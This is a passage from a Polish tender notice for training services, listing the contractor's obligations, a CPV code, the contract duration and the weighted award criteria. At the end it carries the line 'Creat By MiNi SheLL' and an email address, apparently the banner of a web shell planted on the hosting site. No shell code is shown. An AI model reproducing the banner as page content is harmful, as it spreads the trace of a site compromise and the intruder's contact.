- odpowiednie warunki lokalowe i wyposażenie techniczne, adekwatne do rodzaju szkolenia, odpowiadające indywidualnym potrzebom szkoleniowym uczestników, dla każdego uczestnika szkolenia Wykonawca zapewni dostęp do sprawnie działającego sprzętu komputerowego;
- dla każdego uczestnika szkolenia ubezpieczenie od następstw nieszczęśliwych wypadków na szkoleniu oraz w drodze z miejsca zamieszkania do miejsca odbywania szkolenia i z powrotem;
- osobę, która będzie odpowiedzialna za nadzór wewnętrzny służący podnoszeniu jakości prowadzonego szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 03.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. doświadczenie Wykonawcy w realizacji szkoleń zgodnych z przedmiotem zamówienia w okresie ostatnich trzech lat - 30</li>
<li>3. posiadanie przez Wykonawcę certyfikatu jakości usług szkoleniowych w zakresie świadczenia usług szkoleniowych zgodnych z daną częścią przedmiotu zamów - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com